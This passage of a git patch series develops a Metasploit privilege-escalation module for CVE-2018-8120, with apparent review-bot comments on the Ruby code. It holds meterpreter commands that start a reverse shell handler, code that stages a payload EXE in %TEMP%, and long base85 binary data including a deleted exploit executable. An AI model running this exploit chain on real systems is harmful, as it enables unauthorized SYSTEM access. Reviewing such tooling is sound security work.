zxE~qLBgMnWaZ${Hz!Df-0EK06SOJMuuvi0)I3icogUBG5Yy_1NaM=VhEwIT!XAAgj z1)=R=GyzJxz-cc?O>K~x1FHl7nSmo9b_~o;fZ8c=I|FiO!EO=s&V%125WEbAS3vP9 zI9>zEbzu3wr)D#zcQ getuid Server username: zero-PC\zero meterpreter > background [*] Backgrounding session 1... -msf exploit(multi/handler) > use exploit/windows/local/ms18_8120_win32k_privsec -msf exploit(windows/local/ms18_8120_win32k_privsec) > set SESSION 1 +msf exploit(multi/handler) > use exploit/windows/local/ms18_8120_win32k_privesc +msf exploit(windows/local/ms18_8120_win32k_privesc) > set SESSION 1 SESSION => 1 -msf exploit(windows/local/ms18_8120_win32k_privsec) > set LHOST 192.168.1.102 +msf exploit(windows/local/ms18_8120_win32k_privesc) > set LHOST 192.168.1.102 LHOST => 192.168.1.102 -msf exploit(windows/local/ms18_8120_win32k_privsec) > run +msf exploit(windows/local/ms18_8120_win32k_privesc) > run [*] Started reverse TCP handler on 192.168.1.102:4444 [+] Exploiting SetImeInfoEx Win32k NULL Pointer Dereference diff --git a/modules/exploits/windows/local/ms18_8120_win32k_privesc.rb b/modules/exploits/windows/local/ms18_8120_win32k_privesc.rb index 699b58d518..4538e109dd 100644 --- a/modules/exploits/windows/local/ms18_8120_win32k_privesc.rb +++ b/modules/exploits/windows/local/ms18_8120_win32k_privesc.rb @@ -93,9 +93,13 @@ class MetasploitModule < Msf::Exploit::Local def check_arch sys_arch = sysinfo['Architecture'] - if sys_arch == ARCH_X86 || (sys_arch == ARCH_X64 && session.arch == ARCH_X86) + if sys_arch == ARCH_X86 + fail_with(Failure::BadConfig, "Invalid payload architecture") if payload_instance.arch.first == ARCH_X64 + 'CVE-2018-8120x86.exe' elsif sys_arch == ARCH_X64 + 'CVE-2018-8120x86_64.exe' if session.arch == ARCH_X86 + 'CVE-2018-8120x64.exe' else fail_with(Failure::BadConfig, "Invalid architecture") From 96eeaf7da36a9dbe08eb53f538f798c781fe4095 Mon Sep 17 00:00:00 2001 
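Review bot: In the `elsif sys_arch == ARCH_X64` branch of `check_arch` (hunk `@@ -93,9 +93,13 @@`), the added line `'CVE-2018-8120x86_64.exe' if session.arch == ARCH_X86` is a bare expression whose value is discarded, so the branch always evaluates to `'CVE-2018-8120x64.exe'` whatever the session architecture is. A Ruby method returns its last evaluated expression, not an intermediate one. The selection therefore needs an explicit exit, `return 'CVE-2018-8120x86_64.exe' if session.arch == ARCH_X86`, or an `if`/`else` inside the branch. Indentation is collapsed on this page, so the nesting is read from the keywords, and the method's closing `end` lines are outside the hunk.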
From: Dhiraj Mishra Date: Fri, 12 Oct 2018 11:47:53 +0530 Subject: [PATCH 33/39] Made few changes Thank you bcoles --- modules/exploits/windows/local/ms18_8120_win32k_privesc.rb | 5 ++--- 1 file changed, 2 insertions(+), 3 deletions(-) diff --git a/modules/exploits/windows/local/ms18_8120_win32k_privesc.rb b/modules/exploits/windows/local/ms18_8120_win32k_privesc.rb index 4538e109dd..b8d46b0040 100644 --- a/modules/exploits/windows/local/ms18_8120_win32k_privesc.rb +++ b/modules/exploits/windows/local/ms18_8120_win32k_privesc.rb @@ -96,9 +96,8 @@ class MetasploitModule < Msf::Exploit::Local if sys_arch == ARCH_X86 fail_with(Failure::BadConfig, "Invalid payload architecture") if payload_instance.arch.first == ARCH_X64 - 'CVE-2018-8120x86.exe' elsif sys_arch == ARCH_X64 - 'CVE-2018-8120x86_64.exe' if session.arch == ARCH_X86 + return 'CVE-2018-8120x86_64.exe' if session.arch == ARCH_X86 'CVE-2018-8120x64.exe' else @@ -116,7 +115,7 @@ class MetasploitModule < Msf::Exploit::Local vprint_status("EXE's name is: #{rexename}") exe = generate_payload_exe tempdir = session.sys.config.getenv('TEMP') - tempexename = Rex::Text.rand_text_alpha(rand(8)+6) + tempexename = Rex::Text.rand_text_alpha(6..14) cmd = "#{tempdir}\\#{tempexename}.exe" vprint_status("Preparing payload at #{cmd}") From 26631bcfbdf1b5512ef12f818d8768e50efb582d Mon Sep 17 00:00:00 2001 From: Shelby Pace Date: Fri, 12 Oct 2018 14:35:42 -0500 Subject: [PATCH 34/39] addressed suggestions --- .../CVE-2018-8120/CVE-2018-8120x86_64.exe | Bin 83456 -> 0 bytes .../windows/local/ms18_8120_win32k_privesc.rb | 57 ++++++++---------- 2 files changed, 24 insertions(+), 33 deletions(-) delete mode 100755 data/exploits/CVE-2018-8120/CVE-2018-8120x86_64.exe 
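Review bot: `check_arch` (hunk `@@ -96,9 +96,8 @@`) has no comment saying what it returns, and its name reads like a predicate although every path either yields an executable file name or aborts through `fail_with`. With the added `return` the method now mixes an early return, implicit last-expression returns and `fail_with`, which is easy to misread; the line this hunk replaces is an example of that. I would add a header comment above the `def`, such as `# Returns the file name of the executable matching the target and session architecture; calls fail_with(Failure::BadConfig) otherwise.` The `def` line and the closing `end`s are outside this hunk.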
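Review bot: The block around `tempexename = Rex::Text.rand_text_alpha(6..14)` (hunk `@@ -116,7 +115,7 @@`) has no comment recording that the module stages a generated executable under the session's `TEMP` directory. Judging by `cmd = "#{tempdir}\\#{tempexename}.exe"` and the `Preparing payload at` message, the file gets a random alphabetic name, 6 to 14 characters long if the range is inclusive. That is an on-disk artifact which an operator has to account for and which a defender can look for, so it belongs in the source: `# Payload EXE is staged as %TEMP%\<random letters>.exe on the target (on-disk artifact).` The write itself, and whether the file is removed afterwards, are outside this hunk, so the comment should point to where that happens.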
diff --git a/data/exploits/CVE-2018-8120/CVE-2018-8120x86_64.exe b/data/exploits/CVE-2018-8120/CVE-2018-8120x86_64.exe deleted file mode 100755 index e39c4c076fcd935f4cd2c26187f922233f8e2d44..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 83456 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%0A9{4@A- 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 